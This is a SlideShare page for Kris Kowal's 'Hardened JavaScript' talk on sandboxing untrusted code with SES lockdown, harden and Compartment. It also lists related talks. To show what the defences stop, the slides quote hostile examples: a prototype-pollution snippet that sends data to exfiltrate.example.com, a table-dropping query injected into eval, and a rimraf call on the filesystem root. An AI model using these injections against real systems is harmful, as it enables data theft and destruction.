SlideShare a Scribd company logo

Hardened JavaScript

Download as PPTX, PDF
K
KrisKowal2

This document discusses hardened JavaScript and how it can be used to safely run untrusted code. It describes how JavaScript environments like browsers allow arbitrary programs to run but mediate their interactions. It then explains how techniques like freezing objects, compartmentalization, and avoiding direct eval can "harden" JavaScript to prevent malicious code from harming the system or accessing private data. The goal is to allow safe interaction between mutually untrusting code while preventing attacks.

1 of 32
1 Hardened JavaScript 🧙♂️ Kris Kowal 🐦 @kriskowal ✉️ kris@agoric.com
DEC VT100 Terminal, Jason Scott Interaction and Vulnerability Netscape Navigator 1.22 on Windows
3 Interaction and Vulnerability Running other people’s programs is dangerous and some people will even tell you that you shouldn’t do it. You can run other people’s programs safely. The solution is Hardened JavaScript.
Ulysses and the Sirens, 1891, by John William Waterhouse Interaction and Vulnerability
User Agent 5 User agents mediate interaction. A web browser is a user agent. ■ Browsers invite arbitrary programs off the internet to run on your computer. ■ Server sends a program to the client. ■ The client runs the program with limited access to local resources. ■ The browser mediates the interaction through its user interface “chrome”. Motorcycle Reflections, Atoma
Two parties (client and server) are easy to safeguard, but not very interesting. Within a user agent, multiple parties can send each other facets of APIs and interact directly with each other on behalf of the user. ■ Client engages two other services. ■ Client introduces one service to the other, to communicate on its behalf. ■ Browser mediates the interaction, including the ability to revoke communication between third-party services at any time. Three is a Party 6 Granovetter Diagram
■ Sandbox ■ Unforgeable references ■ Closures ■ Run-to-completion event-loop ■ Strict mode ■ Hardenable by freezing 7 Why JavaScript
Queries are Hobbled Programs Consider the case of a data service provider that accepts arbitrary programs instead of a weakened query language. 8 const search = query => { const matches = []; for (const item of database.items()) { if (eval(query)) { matches.push(item); }; } return matches; }; // With great interaction… search('item.price > 50 && item.size == 8'); // …comes great vulnerability. search('database.dropAllTables(), false');
Eval is not exactly Evil The Levenshtein Distance between Eval and Evil is not zero. Eval is not Evil, QED. E V I L E 0 1 2 3 V 1 0 1 2 A 2 1 1 2 L 3 2 2 1
eval('var undefined = null'); console.log(undefined); // null 10 Direct Eval
11 const indirectEval = eval; indirectEval('Math = 2 + 2'); // or: (0, eval)('Array = Object'); console.log(globalThis.Array); // Object Indirect Eval
new Function( 'value', 'globalThis.NaN = value' // 👈 siren song here )(42); console.log(NaN); // 42 12 Function Constructor
How Eval can be used for Evil 13 Let me count the ways. ■ To replace constructors with imposters, ■ To subvert methods on shared prototypes, ■ To distribute furtive missives on properties of unsuspecting objects, ■ To listen to activity through the walls with high resolution timers, ■ To hog local resources like memory or compute time, ■ To use powerful API’s to steal your private keys and scribble on your disk, ■ To run your kitchen sink garbage disposal at inopportune times, ■ To teach your pets to wage a guerrilla war for
Taming Eval ■ 🔒 Lockdown: Freeze every object the language provides, the shared primordials. ■ 🧊 Harden: Give programs a way to deep freeze the objects they share with other parties. ■ 📦 Compartment: Provide a way to make spaces that only have the shared primordials and other explicitly shared objects. Give programs a firm foundation to stand on to defend their own integrity and confidentiality. 14
15 🔒 Lockdown lockdown(); Object.isFrozen(Array); // true Object.isFrozen(Array.prototype); // yes Object.isFrozen(Object); // indeed Object.isFrozen(Object.prototype); // verily
16 🧊 Harden lockdown(); const me = { ma: { ma: {}, pa: {} }, pa: { ma: {}, pa: {} }, }; harden(me); Object.isFrozen(me); // true Object.isFrozen(me.ma); // yes Object.isFrozen(me.ma.ma); // indeed Object.isFrozen(me.ma.pa); // verily Object.isFrozen(me.pa); // quite Object.isFrozen(me.pa.ma); // affirmative Object.isFrozen(me.pa.pa); // indubitably
17 📦 Compartment lockdown(); const compartment = new Compartment({ console }); harden(compartment.globalThis); compartment.evaluate('console.log("Hello, World!");'); compartment.evaluate(`eval("console.log('Hi');")`); compartment.evaluate('[]') instanceof Array; // totally compartment.evaluate('{}') instanceof Object; // exactly compartment.evaluate('globalThis') !== globalThis; // unique! compartment.evaluate('Date.now()'); // NaN compartment.evaluate('new Date()'); // Invalid Date compartment.evaluate('Math.random'); // undefined
Within a Compartment 18 globalThis.NaN = 42; Math = 2 + 2; globalThis.undefined = null; const push = Array.prototype.push; Array.prototype.push = (...args) => { fetch(`https://exfiltrate.example.com?${args}`); return push.apply(this, args); }; Attacker cannot pollute prototypes.
19 lockdown(); const compartment = new Compartment(); harden(compartment.globalThis); const SafeFunction = compartment.globalThis.Function; const search = harden(query => { const match = new SafeFunction('item', query); const matches = []; for (const item of database.items()) { if (match(harden(item))) { matches.push(item); }; } return harden(matches); }); Safe Queries & Hardened JavaScript
Safe Queries & Hardened JavaScript 20 // With great interaction… search('item.price > 50 && item.size == 8'); // ReferenceError: database search('database.dropAllTables(), false'); // Cannot assign search('Array.prototype.push = mitm'); // ReferenceError: require search('require("rimraf")("/")');
Identity Discontinuity 21 const matches = search( 'item.price > 50 && item.size == 8' ); matches instanceof Array // no!?
22 LavaMoat and mitigating supply chain attacks https://github.com/LavaMoat/LavaMoat
23 https://github.com/endojs/endo
24 https://github.com/endojs/endo/packages/ses
25 https://www.moddable.com/
26 Hardened JavaScript Hardened JavaScript in the Agoric Architecture
27 modulecounts.com
28 npm-stats.com for q
Conclusion 29 Hardened JavaScript https://github.com/endojs/endo lockdown(); const compartment = new Compartment(); const sing = compartment.evaluate(sirenSong); sing({ enjoyMusic() { /* … */ }, // drownYourself() { /* … */ }, });
30 Hardened JavaScript https://github.com/endojs/endo $ npm install ses 🧙♂️ Kris Kowal 🐦 @kriskowal ✉️ kris@agoric.com
31
32

Recommended

JavaScript 101 - Class 1
JavaScript 101 - Class 1JavaScript 101 - Class 1
JavaScript 101 - Class 1
Robert Pearce
 
JavaScript Tutorial
JavaScript TutorialJavaScript Tutorial
JavaScript Tutorial
Bui Kiet
 
JavaScript Basics and Trends
JavaScript Basics and TrendsJavaScript Basics and Trends
JavaScript Basics and Trends
Kürşad Gülseven
 
Fundamental JavaScript [UTC, March 2014]
Fundamental JavaScript [UTC, March 2014]Fundamental JavaScript [UTC, March 2014]
Fundamental JavaScript [UTC, March 2014]
Aaron Gustafson
 
eXo SEA - JavaScript Introduction Training
eXo SEA - JavaScript Introduction TrainingeXo SEA - JavaScript Introduction Training
eXo SEA - JavaScript Introduction Training
Hoat Le
 
JavaScript introduction 1 ( Variables And Values )
JavaScript introduction 1 ( Variables And Values )JavaScript introduction 1 ( Variables And Values )
JavaScript introduction 1 ( Variables And Values )
Victor Verhaagen
 
Intro to Javascript
Intro to JavascriptIntro to Javascript
Intro to Javascript
Anjan Banda
 
5 Tips for Better JavaScript
5 Tips for Better JavaScript5 Tips for Better JavaScript
5 Tips for Better JavaScript
Todd Anglin
 

Recommended

JavaScript 101 - Class 1
JavaScript 101 - Class 1JavaScript 101 - Class 1
JavaScript 101 - Class 1
Robert Pearce
 
JavaScript Tutorial
JavaScript TutorialJavaScript Tutorial
JavaScript Tutorial
Bui Kiet
 
JavaScript Basics and Trends
JavaScript Basics and TrendsJavaScript Basics and Trends
JavaScript Basics and Trends
Kürşad Gülseven
 
Fundamental JavaScript [UTC, March 2014]
Fundamental JavaScript [UTC, March 2014]Fundamental JavaScript [UTC, March 2014]
Fundamental JavaScript [UTC, March 2014]
Aaron Gustafson
 
eXo SEA - JavaScript Introduction Training
eXo SEA - JavaScript Introduction TrainingeXo SEA - JavaScript Introduction Training
eXo SEA - JavaScript Introduction Training
Hoat Le
 
JavaScript introduction 1 ( Variables And Values )
JavaScript introduction 1 ( Variables And Values )JavaScript introduction 1 ( Variables And Values )
JavaScript introduction 1 ( Variables And Values )
Victor Verhaagen
 
Intro to Javascript
Intro to JavascriptIntro to Javascript
Intro to Javascript
Anjan Banda
 
5 Tips for Better JavaScript
5 Tips for Better JavaScript5 Tips for Better JavaScript
5 Tips for Better JavaScript
Todd Anglin
 
Swift internals
Swift internalsSwift internals
Swift internals
Jung Kim
 
Funcitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional WayFuncitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional Way
Natasha Murashev
 
A Re-Introduction to JavaScript
A Re-Introduction to JavaScriptA Re-Introduction to JavaScript
A Re-Introduction to JavaScript
Simon Willison
 
LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기
Wanbok Choi
 
SWIFT 3
SWIFT 3SWIFT 3
SWIFT 3
Chuong Huynh
 
Anonymous functions in JavaScript
Anonymous functions in JavaScriptAnonymous functions in JavaScript
Anonymous functions in JavaScript
Mohammed Sazid Al Rashid
 
JavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UXJavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UX
JWORKS powered by Ordina
 
RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017
Wanbok Choi
 
Letswift Swift 3.0
Letswift Swift 3.0Letswift Swift 3.0
Letswift Swift 3.0
Sehyun Park
 
Stuff you didn't know about action script
Stuff you didn't know about action scriptStuff you didn't know about action script
Stuff you didn't know about action script
Christophe Herreman
 
Javascript basics for automation testing
Javascript basics for automation testingJavascript basics for automation testing
Javascript basics for automation testing
Vikas Thange
 
Bottom Up
Bottom UpBottom Up
Bottom Up
Brian Moschel
 
10. session 10 loops and arrays
10. session 10 loops and arrays10. session 10 loops and arrays
10. session 10 loops and arrays
Phúc Đỗ
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
Jussi Pohjolainen
 
Powerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best PracticesPowerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best Practices
Dragos Ionita
 
Java script
Java scriptJava script
Java script
Adrian Caetano
 
Java Script Best Practices
Java Script Best PracticesJava Script Best Practices
Java Script Best Practices
Enrique Juan de Dios
 
Javascript And J Query
Javascript And J QueryJavascript And J Query
Javascript And J Query
itsarsalan
 
Headless Js Testing
Headless Js TestingHeadless Js Testing
Headless Js Testing
Brian Moschel
 
Advanced javascript
Advanced javascriptAdvanced javascript
Advanced javascript
Doeun KOCH
 
JavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talkJavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talk
Thomas Kjeldahl Nilsson
 
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
Doug Jones
 

More Related Content

What's hot

Swift internals
Swift internalsSwift internals
Swift internals
Jung Kim
 
Funcitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional WayFuncitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional Way
Natasha Murashev
 
A Re-Introduction to JavaScript
A Re-Introduction to JavaScriptA Re-Introduction to JavaScript
A Re-Introduction to JavaScript
Simon Willison
 
LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기
Wanbok Choi
 
SWIFT 3
SWIFT 3SWIFT 3
SWIFT 3
Chuong Huynh
 
Anonymous functions in JavaScript
Anonymous functions in JavaScriptAnonymous functions in JavaScript
Anonymous functions in JavaScript
Mohammed Sazid Al Rashid
 
JavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UXJavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UX
JWORKS powered by Ordina
 
RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017
Wanbok Choi
 
Letswift Swift 3.0
Letswift Swift 3.0Letswift Swift 3.0
Letswift Swift 3.0
Sehyun Park
 
Stuff you didn't know about action script
Stuff you didn't know about action scriptStuff you didn't know about action script
Stuff you didn't know about action script
Christophe Herreman
 
Javascript basics for automation testing
Javascript basics for automation testingJavascript basics for automation testing
Javascript basics for automation testing
Vikas Thange
 
Bottom Up
Bottom UpBottom Up
Bottom Up
Brian Moschel
 
10. session 10 loops and arrays
10. session 10 loops and arrays10. session 10 loops and arrays
10. session 10 loops and arrays
Phúc Đỗ
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
Jussi Pohjolainen
 
Powerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best PracticesPowerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best Practices
Dragos Ionita
 
Java script
Java scriptJava script
Java script
Adrian Caetano
 
Java Script Best Practices
Java Script Best PracticesJava Script Best Practices
Java Script Best Practices
Enrique Juan de Dios
 
Javascript And J Query
Javascript And J QueryJavascript And J Query
Javascript And J Query
itsarsalan
 
Headless Js Testing
Headless Js TestingHeadless Js Testing
Headless Js Testing
Brian Moschel
 
Advanced javascript
Advanced javascriptAdvanced javascript
Advanced javascript
Doeun KOCH
 

What's hot (20)

Swift internals
Swift internalsSwift internals
Swift internals
 
Funcitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional WayFuncitonal Swift Conference: The Functional Way
Funcitonal Swift Conference: The Functional Way
 
A Re-Introduction to JavaScript
A Re-Introduction to JavaScriptA Re-Introduction to JavaScript
A Re-Introduction to JavaScript
 
LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기LetSwift RxSwift 시작하기
LetSwift RxSwift 시작하기
 
SWIFT 3
SWIFT 3SWIFT 3
SWIFT 3
 
Anonymous functions in JavaScript
Anonymous functions in JavaScriptAnonymous functions in JavaScript
Anonymous functions in JavaScript
 
JavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UXJavaScript Basics and Best Practices - CC FE & UX
JavaScript Basics and Best Practices - CC FE & UX
 
RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017RxSwift 활용하기 - Let'Swift 2017
RxSwift 활용하기 - Let'Swift 2017
 
Letswift Swift 3.0
Letswift Swift 3.0Letswift Swift 3.0
Letswift Swift 3.0
 
Stuff you didn't know about action script
Stuff you didn't know about action scriptStuff you didn't know about action script
Stuff you didn't know about action script
 
Javascript basics for automation testing
Javascript basics for automation testingJavascript basics for automation testing
Javascript basics for automation testing
 
Bottom Up
Bottom UpBottom Up
Bottom Up
 
10. session 10 loops and arrays
10. session 10 loops and arrays10. session 10 loops and arrays
10. session 10 loops and arrays
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
 
Powerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best PracticesPowerful JavaScript Tips and Best Practices
Powerful JavaScript Tips and Best Practices
 
Java script
Java scriptJava script
Java script
 
Java Script Best Practices
Java Script Best PracticesJava Script Best Practices
Java Script Best Practices
 
Javascript And J Query
Javascript And J QueryJavascript And J Query
Javascript And J Query
 
Headless Js Testing
Headless Js TestingHeadless Js Testing
Headless Js Testing
 
Advanced javascript
Advanced javascriptAdvanced javascript
Advanced javascript
 

Similar to Hardened JavaScript

JavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talkJavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talk
Thomas Kjeldahl Nilsson
 
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
Doug Jones
 
Virtual events in C#: something went wrong
Virtual events in C#: something went wrongVirtual events in C#: something went wrong
Virtual events in C#: something went wrong
PVS-Studio
 
Sony C#/.NET component set analysis
Sony C#/.NET component set analysisSony C#/.NET component set analysis
Sony C#/.NET component set analysis
PVS-Studio
 
Douglas Crockford Presentation Goodparts
Douglas Crockford Presentation GoodpartsDouglas Crockford Presentation Goodparts
Douglas Crockford Presentation Goodparts
Ajax Experience 2009
 
Thinking In Swift
Thinking In SwiftThinking In Swift
Thinking In Swift
Janie Clayton
 
JavaScript Best Pratices
JavaScript Best PraticesJavaScript Best Pratices
JavaScript Best Pratices
ChengHui Weng
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injection
Mickey Jack
 
Javascript status 2016
Javascript status 2016Javascript status 2016
Javascript status 2016
Arshavski Alexander
 
Javascript: the important bits
Javascript: the important bitsJavascript: the important bits
Javascript: the important bits
Chris Saylor
 
Goodparts
GoodpartsGoodparts
Goodparts
damonjablons
 
Mind your language(s), A Discussion about Languages and Security
Mind your language(s), A Discussion about Languages and SecurityMind your language(s), A Discussion about Languages and Security
Mind your language(s), A Discussion about Languages and Security
AdaCore
 
Java Performance Tuning
Java Performance TuningJava Performance Tuning
Java Performance Tuning
Minh Hoang
 
JavaScript Misunderstood
JavaScript MisunderstoodJavaScript Misunderstood
JavaScript Misunderstood
Bhavya Siddappa
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source Components
PVS-Studio
 
Robots in Swift
Robots in SwiftRobots in Swift
Robots in Swift
Janie Clayton
 
Java script for web developer
Java script for web developerJava script for web developer
Java script for web developer
Chalermpon Areepong
 
Javascript
JavascriptJavascript
Javascript
Aditya Gaur
 
JUNit Presentation
JUNit PresentationJUNit Presentation
JUNit Presentation
Animesh Kumar
 
Advanced JavaScript - Internship Presentation - Week6
Advanced JavaScript - Internship Presentation - Week6Advanced JavaScript - Internship Presentation - Week6
Advanced JavaScript - Internship Presentation - Week6
Devang Garach
 

Similar to Hardened JavaScript (20)

JavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talkJavaScript Neednt Hurt - JavaBin talk
JavaScript Neednt Hurt - JavaBin talk
 
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
JavaScript: The Good Parts Or: How A C# Developer Learned To Stop Worrying An...
 
Virtual events in C#: something went wrong
Virtual events in C#: something went wrongVirtual events in C#: something went wrong
Virtual events in C#: something went wrong
 
Sony C#/.NET component set analysis
Sony C#/.NET component set analysisSony C#/.NET component set analysis
Sony C#/.NET component set analysis
 
Douglas Crockford Presentation Goodparts
Douglas Crockford Presentation GoodpartsDouglas Crockford Presentation Goodparts
Douglas Crockford Presentation Goodparts
 
Thinking In Swift
Thinking In SwiftThinking In Swift
Thinking In Swift
 
JavaScript Best Pratices
JavaScript Best PraticesJavaScript Best Pratices
JavaScript Best Pratices
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injection
 
Javascript status 2016
Javascript status 2016Javascript status 2016
Javascript status 2016
 
Javascript: the important bits
Javascript: the important bitsJavascript: the important bits
Javascript: the important bits
 
Goodparts
GoodpartsGoodparts
Goodparts
 
Mind your language(s), A Discussion about Languages and Security
Mind your language(s), A Discussion about Languages and SecurityMind your language(s), A Discussion about Languages and Security
Mind your language(s), A Discussion about Languages and Security
 
Java Performance Tuning
Java Performance TuningJava Performance Tuning
Java Performance Tuning
 
JavaScript Misunderstood
JavaScript MisunderstoodJavaScript Misunderstood
JavaScript Misunderstood
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source Components
 
Robots in Swift
Robots in SwiftRobots in Swift
Robots in Swift
 
Java script for web developer
Java script for web developerJava script for web developer
Java script for web developer
 
Javascript
JavascriptJavascript
Javascript
 
JUNit Presentation
JUNit PresentationJUNit Presentation
JUNit Presentation
 
Advanced JavaScript - Internship Presentation - Week6
Advanced JavaScript - Internship Presentation - Week6Advanced JavaScript - Internship Presentation - Week6
Advanced JavaScript - Internship Presentation - Week6
 

Recently uploaded

Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
shadow0702a
 
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student MemberIEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
VICTOR MAESTRE RAMIREZ
 
Comparative analysis between traditional aquaponics and reconstructed aquapon...
Comparative analysis between traditional aquaponics and reconstructed aquapon...Comparative analysis between traditional aquaponics and reconstructed aquapon...
Comparative analysis between traditional aquaponics and reconstructed aquapon...
bijceesjournal
 
Data Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason WebinarData Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason Webinar
UReason
 
Material for memory and display system h
Material for memory and display system hMaterial for memory and display system h
Material for memory and display system h
gowrishankartb2005
 
Rainfall intensity duration frequency curve statistical analysis and modeling...
Rainfall intensity duration frequency curve statistical analysis and modeling...Rainfall intensity duration frequency curve statistical analysis and modeling...
Rainfall intensity duration frequency curve statistical analysis and modeling...
bijceesjournal
 
Welding Metallurgy Ferrous Materials.pdf
Welding Metallurgy Ferrous Materials.pdfWelding Metallurgy Ferrous Materials.pdf
Welding Metallurgy Ferrous Materials.pdf
AjmalKhan50578
 
Null Bangalore | Pentesters Approach to AWS IAM
Null Bangalore | Pentesters Approach to AWS IAMNull Bangalore | Pentesters Approach to AWS IAM
Null Bangalore | Pentesters Approach to AWS IAM
Divyanshu
 
An improved modulation technique suitable for a three level flying capacitor ...
An improved modulation technique suitable for a three level flying capacitor ...An improved modulation technique suitable for a three level flying capacitor ...
An improved modulation technique suitable for a three level flying capacitor ...
IJECEIAES
 
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
ydzowc
 
Data Control Language.pptx Data Control Language.pptx
Data Control Language.pptx Data Control Language.pptxData Control Language.pptx Data Control Language.pptx
Data Control Language.pptx Data Control Language.pptx
ramrag33
 
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
171ticu
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
ecqow
 
Computational Engineering IITH Presentation
Computational Engineering IITH PresentationComputational Engineering IITH Presentation
Computational Engineering IITH Presentation
co23btech11018
 
ITSM Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptxITSM Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
VANDANAMOHANGOUDA
 
integral complex analysis chapter 06 .pdf
integral complex analysis chapter 06 .pdfintegral complex analysis chapter 06 .pdf
integral complex analysis chapter 06 .pdf
gaafergoudaay7aga
 
Properties Railway Sleepers and Test.pptx
Properties Railway Sleepers and Test.pptxProperties Railway Sleepers and Test.pptx
Properties Railway Sleepers and Test.pptx
MDSABBIROJJAMANPAYEL
 
Embedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoringEmbedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoring
IJECEIAES
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
KrishnaveniKrishnara1
 
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURSCompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
RamonNovais6
 

Recently uploaded (20)

Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
 
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student MemberIEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
 
Comparative analysis between traditional aquaponics and reconstructed aquapon...
Comparative analysis between traditional aquaponics and reconstructed aquapon...Comparative analysis between traditional aquaponics and reconstructed aquapon...
Comparative analysis between traditional aquaponics and reconstructed aquapon...
 
Data Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason WebinarData Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason Webinar
 
Material for memory and display system h
Material for memory and display system hMaterial for memory and display system h
Material for memory and display system h
 
Rainfall intensity duration frequency curve statistical analysis and modeling...
Rainfall intensity duration frequency curve statistical analysis and modeling...Rainfall intensity duration frequency curve statistical analysis and modeling...
Rainfall intensity duration frequency curve statistical analysis and modeling...
 
Welding Metallurgy Ferrous Materials.pdf
Welding Metallurgy Ferrous Materials.pdfWelding Metallurgy Ferrous Materials.pdf
Welding Metallurgy Ferrous Materials.pdf
 
Null Bangalore | Pentesters Approach to AWS IAM
Null Bangalore | Pentesters Approach to AWS IAMNull Bangalore | Pentesters Approach to AWS IAM
Null Bangalore | Pentesters Approach to AWS IAM
 
An improved modulation technique suitable for a three level flying capacitor ...
An improved modulation technique suitable for a three level flying capacitor ...An improved modulation technique suitable for a three level flying capacitor ...
An improved modulation technique suitable for a three level flying capacitor ...
 
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
原版制作(Humboldt毕业证书)柏林大学毕业证学位证一模一样
 
Data Control Language.pptx Data Control Language.pptx
Data Control Language.pptx Data Control Language.pptxData Control Language.pptx Data Control Language.pptx
Data Control Language.pptx Data Control Language.pptx
 
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
 
Computational Engineering IITH Presentation
Computational Engineering IITH PresentationComputational Engineering IITH Presentation
Computational Engineering IITH Presentation
 
ITSM Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptxITSM Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
 
integral complex analysis chapter 06 .pdf
integral complex analysis chapter 06 .pdfintegral complex analysis chapter 06 .pdf
integral complex analysis chapter 06 .pdf
 
Properties Railway Sleepers and Test.pptx
Properties Railway Sleepers and Test.pptxProperties Railway Sleepers and Test.pptx
Properties Railway Sleepers and Test.pptx
 
Embedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoringEmbedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoring
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
 
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURSCompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
 

Hardened JavaScript

  • 1. 1 Hardened JavaScript 🧙♂️ Kris Kowal 🐦 @kriskowal ✉️ kris@agoric.com
  • 2. DEC VT100 Terminal, Jason Scott Interaction and Vulnerability Netscape Navigator 1.22 on Windows
  • 3. 3 Interaction and Vulnerability Running other people’s programs is dangerous and some people will even tell you that you shouldn’t do it. You can run other people’s programs safely. The solution is Hardened JavaScript.
  • 4. Ulysses and the Sirens, 1891, by John William Waterhouse Interaction and Vulnerability
  • 5. User Agent 5 User agents mediate interaction. A web browser is a user agent. ■ Browsers invite arbitrary programs off the internet to run on your computer. ■ Server sends a program to the client. ■ The client runs the program with limited access to local resources. ■ The browser mediates the interaction through its user interface “chrome”. Motorcycle Reflections, Atoma
  • 6. Two parties (client and server) are easy to safeguard, but not very interesting. Within a user agent, multiple parties can send each other facets of APIs and interact directly with each other on behalf of the user. ■ Client engages two other services. ■ Client introduces one service to the other, to communicate on its behalf. ■ Browser mediates the interaction, including the ability to revoke communication between third-party services at any time. Three is a Party 6 Granovetter Diagram
